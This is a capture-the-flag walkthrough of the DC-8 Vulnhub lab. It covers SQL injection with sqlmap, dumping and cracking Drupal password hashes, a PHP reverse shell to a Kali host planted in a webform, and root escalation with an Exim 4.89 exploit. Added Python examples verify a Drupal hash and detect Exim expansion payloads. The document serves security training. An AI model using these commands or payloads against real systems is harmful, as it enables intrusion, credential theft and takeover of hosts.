
【Vulnhub】—DC-8

1. Host discovery

Running netdiscover on the local segment turned up the target at 192.168.203.134.

2. Port scanning

root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.134
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.134
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.134:80/node/3
|     Form id: webform-client-form-3
|_    Form action: /node/3
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /CHANGELOG.txt: Drupal v1
|   /: Drupal version 7 
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:05:ED:41 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.203.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.44 seconds

The target exposes only ports 22 (OpenSSH 7.4p1) and 80 (Apache); http-enum identifies the web site as Drupal 7 from the CHANGELOG.txt and INSTALL*.txt files it leaves readable.

3. Exploitation

Open the site in a browser:

The two points of interest are the two red boxes in the screenshot. Clicking the upper one gives the URL:

http://192.168.203.134/node/2

Clicking the lower one gives instead:

http://192.168.203.134/?nid=2

A raw numeric id parameter like that is worth testing straight away:

Sure enough, the nid parameter is SQL-injectable. Next, hand it over to sqlmap.

sqlmap -u http://192.168.203.134/?nid=2 --dbs
----------------------------------------------------------------------------
[22:49:32] [INFO] used SQL query returns 2 entries
[22:49:32] [INFO] retrieved: 'd7db'
[22:49:32] [INFO] retrieved: 'information_schema'
available databases [2]:                                                       
[*] d7db
[*] information_schema


sqlmap -u http://192.168.203.134/?nid=2 -D d7db --tables
----------------------------------------------------------------------------
Database: d7db                                                                                       
[88 tables]
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+


sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users --columns
----------------------------------------------------------------------------
Database: d7db                                                                                       
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| language         | varchar(12)      |
| access           | int(11)          |
| created          | int(11)          |
| data             | longblob         |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| name             | varchar(60)      |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| status           | tinyint(4)       |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+


sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users -C name,pass --dump
----------------------------------------------------------------------------
Database: d7db                                                                                       
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

Two accounts in the bag.

Next, crack the hashes with john (John the Ripper).

Only john's hash cracks, giving the password turtle; the admin hash does not fall to the wordlist. Log in to the Drupal backend as john.
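
As an added example (not part of the original write-up), the check below re-implements Drupal 7's password scheme in Python so the cracked value can be confirmed offline against the hash sqlmap dumped for john above. Drupal 7 hashes are phpass-style: the $S$ prefix selects SHA-512, the fourth character encodes the iteration count as a power of two (here 'D', i.e. 2^15 = 32768 rounds), the next eight characters are the salt, and the output is a custom base64 encoding truncated to 55 characters. The function names are my own; the hash value is the one from the dump.

```python
"""Verify a cracked Drupal 7 password against a dumped $S$ hash.

Added example, not code from the write-up or from Drupal itself: a port of
Drupal 7's password.inc (phpass-style iterated SHA-512 with a custom base64).
"""
import hashlib
import math

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # Drupal keeps only the first 55 chars of the encoding
MIN_LOG2, MAX_LOG2 = 7, 30  # iteration-count bounds Drupal 7 accepts

# Hash for user 'john' from the sqlmap dump above.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def phpass_b64(data: bytes) -> str:
    """phpass/Drupal base64: 6-bit groups taken little-endian, ITOA64 alphabet."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(algo: str, password: bytes, setting: str):
    """Port of _password_crypt(): returns the 55-char hash string, or None."""
    if len(password) > 512:       # Drupal refuses very long passwords (DoS guard)
        return None
    setting = setting[:12]        # "$S$" + iteration char + 8-char salt
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    if setting[3] not in ITOA64:
        return None
    count_log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt = setting[4:12].encode()
    h = hashlib.new(algo, salt + password).digest()
    for _ in range(1 << count_log2):          # PHP: do { ... } while (--$count)
        h = hashlib.new(algo, h + password).digest()
    encoded = setting + phpass_b64(h)
    if len(encoded) != 12 + math.ceil(8 * len(h) / 6):
        return None
    return encoded[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password(): $S$ is sha512, $P$/$H$ are md5 (imported)."""
    pw = password.encode()
    if stored.startswith("U$"):   # hash migrated from Drupal 6: md5 the password first
        stored = stored[1:]
        pw = hashlib.md5(pw).hexdigest().encode()
    algo = {"$S$": "sha512", "$P$": "md5", "$H$": "md5"}.get(stored[:3])
    if algo is None:
        return False
    computed = drupal7_crypt(algo, pw, stored)
    return computed is not None and computed == stored


def iteration_count(stored: str) -> int:
    """Work factor encoded in the hash: 2 ** index(setting[3])."""
    return 1 << ITOA64.index(stored[3])


if __name__ == "__main__":
    print("iterations:", iteration_count(JOHN_HASH))
    print("turtle matches john:", check_password("turtle", JOHN_HASH))
```

The 32768 iterations are why cracking is slow compared with a plain MD5 dump: each wordlist candidate costs 32769 SHA-512 calls, which is also why john's rockyou run only returned the weak password and not admin's.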

4. Getting a shell

Following the approach learned in DC-7, we could add a Basic page containing PHP,

but john apparently lacks the permission to use the PHP code text format, so PHP cannot be written that way.

So we look for another way out.

The breakthrough turned out to be in webform, whose settings john can edit:

Add the following PHP to it:

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.203.129/7777 0>&1' ");
?> 

and save. Here 192.168.203.129 is the attacking Kali machine, which must already be listening on port 7777 before the payload fires.

How do we trigger it? Submit the contact form (send a message), which makes Drupal evaluate the stored PHP.

Click submit and the reverse shell connects back as www-data.

5. Privilege escalation

Look for SUID-root programs with:

find / -user root -perm -4000 -print 2>/dev/null

exim4 stands out in the list.

Exim is an MTA (Mail Transfer Agent) released under the GPL, i.e. open-source software. It runs mainly on Unix-like systems and is usually paired with Dovecot or Courier. The name is also the English abbreviation of Export-Import.

It has plenty of known vulnerabilities, so check the installed version with exim -bV:

The version is 4.89.

Look that up in searchsploit:

There is indeed a local privilege escalation script matching this version (Exploit-DB 46996, raptor_exim_wiz).

Its header documents two modes:

# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
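
Before running the script, it helps to know what it actually sends, because that is also what a defender would look for. 46996.sh is the local variant of CVE-2019-10149 (the "Return of the WIZard" bug, Exim 4.87 through 4.91): Exim ran the recipient's local part through its string-expansion engine, so a recipient like ${run{...}}@localhost executes a command as root during delivery, and the SMTP transcript the script prints later in this section is simply a message being accepted for such a recipient. The Python below is an added example, not the exploit's code or the write-up's: it inspects SMTP envelope commands for expansion items, decodes the \xHH escapes that Exim's expander accepts (and that payloads use to avoid literal slashes in a local part), and grades what it finds. The envelope lines are constructed for the example; the ${run{...}} one carries a harmless 'id', not the exploit's payload, and the function names are my own.

```python
"""Flag Exim string-expansion payloads in SMTP envelope addresses.

Added example: not the write-up's code and not raptor_exim_wiz. Function
names are assumptions; the sample envelope is constructed for this example.
"""
import re

# Expansion items that run commands or read files/sockets. ${run{...}} is the
# one used against CVE-2019-10149; any other ${item...} in an address is odd too.
DANGEROUS_ITEMS = {"run", "readfile", "readsocket", "perl", "dlfunc", "lookup"}
ITEM_RE = re.compile(r"\$\{([A-Za-z_]+)")
HEX_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<(.*)>\s*$", re.IGNORECASE)

# Constructed client-side SMTP envelope, as a proxy or honeypot might log it.
SAMPLE_ENVELOPE = [
    "MAIL FROM:<www-data@dc-8>",
    "RCPT TO:<john@dc-8>",
    # harmless command ('id'), written with the \xHH / \t escapes Exim decodes
    "RCPT TO:<${run{\\x2fbin\\x2fsh\\t-c\\t\\x22id\\x22}}@localhost>",
    "RCPT TO:<${substr{0}{4}{abcdef}}@dc-8>",
]


def decode_exim_escapes(s: str) -> str:
    """Undo the \\xHH, \\t and \\n escapes that Exim's expander interprets."""
    s = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return s.replace("\\t", "\t").replace("\\n", "\n")


def inspect_address(addr: str) -> dict:
    """Classify one envelope address as ok / suspicious / critical."""
    decoded = decode_exim_escapes(addr)
    items = ITEM_RE.findall(decoded)
    if set(items) & DANGEROUS_ITEMS:
        severity = "critical"
    elif items:
        severity = "suspicious"
    else:
        severity = "ok"
    return {"address": addr, "decoded": decoded,
            "expansion_items": items, "severity": severity}


def scan_envelope(lines):
    """Return findings (non-ok addresses) for MAIL FROM / RCPT TO lines."""
    findings = []
    for line in lines:
        m = ENVELOPE_RE.match(line.strip())
        if not m:
            continue
        result = inspect_address(m.group(2))
        result["command"] = m.group(1).upper()
        if result["severity"] != "ok":
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_envelope(SAMPLE_ENVELOPE):
        print(f["severity"], f["command"], repr(f["decoded"]))
```

Decoding before matching matters: a signature that only looks for the literal string "/bin/sh" misses the exploit entirely, because the slashes never appear on the wire. The real fix is the upgrade to Exim 4.92, which stopped expanding recipient local parts.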

Next, serve the script over HTTP from Kali, download it into /tmp on the target, make it executable with chmod +x 46996.sh, and run it:

We use the netcat method, but it keeps failing:

bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

The cause: the script was saved with Windows (CRLF) line endings, so the kernel reads the shebang as /bin/bash followed by a carriage return (^M) and looks for an interpreter by that name, which does not exist.

Convert the file to Unix line endings on Kali before serving it again:

root@kali:~# dos2unix 46996.sh
dos2unix: converting file 46996.sh to Unix format...

With that fixed the script runs, a root shell appears on localhost:31337, and the flag follows:

www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 17 Feb 2020 12:51:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j3WV9-0000MX-2j
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# whoami
whoami
whoami
root
root@dc-8:/var/spool/exim4# cd /root
cd /root
cd /root
root@dc-8:/root# ls
ls
ls
flag.txt
root@dc-8:/root# cat flag.txt
cat flag.txt
cat flag.txt


Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
